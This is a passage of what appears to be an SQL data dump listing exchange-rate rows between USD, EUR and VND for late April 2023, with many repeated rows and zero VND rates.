(2786, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2787, 2, 'EUR', 0.000000, 1, 'USD', 1.094400, '2023-04-21'),
(2788, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-21'),
(2789, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-21'),
(2790, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-21'),
(2791, 1, 'USD', 1.000000, 2, 'EUR', 0.913740, '2023-04-22'),
(2792, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2793, 2, 'EUR', 1.000000, 1, 'USD', 1.094400, '2023-04-22'),
(2794, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2795, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2796, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2797, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2798, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2799, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2800, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2801, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2802, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2803, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2804, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2805, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2806, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2807, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2808, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2809, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2810, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2811, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2812, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2813, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2814, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2815, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2816, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2817, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2818, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2819, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2820, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2821, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2822, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2823, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2824, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2825, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2826, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2827, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2828, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2829, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2830, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2831, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2832, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2833, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-22'),
(2834, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2835, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-22'),
(2836, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-22'),
(2837, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-22'),
(2838, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-22'),
(2839, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2840, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2841, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2842, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2843, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2844, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2845, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2846, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2847, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2848, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2849, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2850, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2851, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2852, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2853, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2854, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2855, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2856, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2857, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2858, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2859, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2860, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2861, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2862, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2863, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2864, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2865, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2866, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2867, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2868, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2869, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2870, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2871, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2872, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2873, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2874, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2875, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2876, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2877, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2878, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2879, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2880, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2881, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-23'),
(2882, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2883, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-23'),
(2884, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-23'),
(2885, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-23'),
(2886, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-23'),
(2887, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2888, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2889, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2890, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2891, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2892, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2893, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2894, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2895, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2896, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2897, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2898, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2899, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2900, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2901, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2902, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2903, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2904, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2905, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2906, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2907, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2908, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2909, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2910, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2911, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2912, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2913, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2914, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2915, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2916, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2917, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2918, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2919, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2920, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2921, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2922, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2923, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2924, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2925, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2926, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2927, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2928, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2929, 1, 'USD', 0.000000, 2, 'EUR', 0.910910, '2023-04-24'),
(2930, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2931, 2, 'EUR', 0.000000, 1, 'USD', 1.097800, '2023-04-24'),
(2932, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-24'),
(2933, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-24'),
(2934, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-24'),
(2935, 1, 'USD', 1.000000, 2, 'EUR', 0.910910, '2023-04-25'),
(2936, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2937, 2, 'EUR', 1.000000, 1, 'USD', 1.097800, '2023-04-25'),
(2938, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2939, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2940, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2941, 1, 'USD', 0.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2942, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2943, 2, 'EUR', 0.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2944, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2945, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2946, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2947, 1, 'USD', 1.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2948, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2949, 2, 'EUR', 1.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2950, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2951, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2952, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2953, 1, 'USD', 0.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2954, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2955, 2, 'EUR', 0.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2956, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2957, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2958, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2959, 1, 'USD', 1.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2960, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2961, 2, 'EUR', 1.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2962, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2963, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2964, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2965, 1, 'USD', 0.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2966, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2967, 2, 'EUR', 0.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2968, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2969, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2970, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2971, 1, 'USD', 1.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2972, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2973, 2, 'EUR', 1.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2974, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2975, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2976, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2977, 1, 'USD', 0.000000, 2, 'EUR', 0.908930, '2023-04-25'),
(2978, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2979, 2, 'EUR', 0.000000, 1, 'USD', 1.100200, '2023-04-25'),
(2980, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-25'),
(2981, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-25'),
(2982, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-25'),
(2983, 1, 'USD', 1.000000, 2, 'EUR', 0.908930, '2023-04-26'),
(2984, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2985, 2, 'EUR', 1.000000, 1, 'USD', 1.100200, '2023-04-26'),
(2986, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2987, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-26'),
(2988, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(2989, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(2990, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2991, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-04-26'),
(2992, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2993, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-26'),
(2994, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(2995, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(2996, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2997, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-04-26'),
(2998, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(2999, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3000, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3001, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(3002, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3003, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-04-26'),
(3004, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3005, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3006, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3007, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(3008, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3009, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-04-26'),
(3010, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3011, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3012, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3013, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(3014, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3015, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-04-26'),
(3016, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3017, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3018, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3019, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(3020, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3021, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-04-26'),
(3022, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3023, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3024, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3025, 1, 'USD', 0.000000, 2, 'EUR', 0.907280, '2023-04-26'),
(3026, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3027, 2, 'EUR', 0.000000, 1, 'USD', 1.102200, '2023-04-26'),
(3028, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-26'),
(3029, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-26'),
(3030, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-26'),
(3031, 1, 'USD', 1.000000, 2, 'EUR', 0.907280, '2023-04-27'),
(3032, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3033, 2, 'EUR', 1.000000, 1, 'USD', 1.102200, '2023-04-27'),
(3034, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3035, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3036, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3037, 1, 'USD', 0.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3038, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3039, 2, 'EUR', 0.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3040, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3041, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3042, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3043, 1, 'USD', 1.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3044, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3045, 2, 'EUR', 1.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3046, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3047, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3048, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3049, 1, 'USD', 0.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3050, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3051, 2, 'EUR', 0.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3052, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3053, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3054, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3055, 1, 'USD', 1.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3056, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3057, 2, 'EUR', 1.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3058, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3059, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3060, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3061, 1, 'USD', 0.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3062, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3063, 2, 'EUR', 0.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3064, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3065, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3066, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3067, 1, 'USD', 1.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3068, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3069, 2, 'EUR', 1.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3070, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3071, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3072, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3073, 1, 'USD', 0.000000, 2, 'EUR', 0.905880, '2023-04-27'),
(3074, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3075, 2, 'EUR', 0.000000, 1, 'USD', 1.103900, '2023-04-27'),
(3076, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-27'),
(3077, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-27'),
(3078, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-27'),
(3079, 1, 'USD', 1.000000, 2, 'EUR', 0.905880, '2023-04-28'),
(3080, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3081, 2, 'EUR', 1.000000, 1, 'USD', 1.103900, '2023-04-28'),
(3082, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3083, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3084, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3085, 1, 'USD', 0.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3086, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3087, 2, 'EUR', 0.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3088, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3089, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3090, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3091, 1, 'USD', 1.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3092, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3093, 2, 'EUR', 1.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3094, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3095, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3096, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3097, 1, 'USD', 0.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3098, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3099, 2, 'EUR', 0.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3100, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3101, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3102, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3103, 1, 'USD', 1.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3104, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3105, 2, 'EUR', 1.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3106, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3107, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3108, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3109, 1, 'USD', 0.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3110, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3111, 2, 'EUR', 0.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3112, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3113, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3114, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3115, 1, 'USD', 1.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3116, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3117, 2, 'EUR', 1.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3118, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3119, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3120, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3121, 1, 'USD', 0.000000, 2, 'EUR', 0.905630, '2023-04-28'),
(3122, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3123, 2, 'EUR', 0.000000, 1, 'USD', 1.104200, '2023-04-28'),
(3124, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-28'),
(3125, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-28'),
(3126, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-28'),
(3127, 1, 'USD', 1.000000, 2, 'EUR', 0.905630, '2023-04-29'),
(3128, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3129, 2, 'EUR', 1.000000, 1, 'USD', 1.104200, '2023-04-29'),
(3130, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3131, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-29'),
(3132, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-29'),
(3133, 1, 'USD', 0.000000, 2, 'EUR', 0.910660, '2023-04-29'),
(3134, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
(3135, 2, 'EUR', 0.000000, 1, 'USD', 1.098100, '2023-04-29'),
(3136, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-29'),
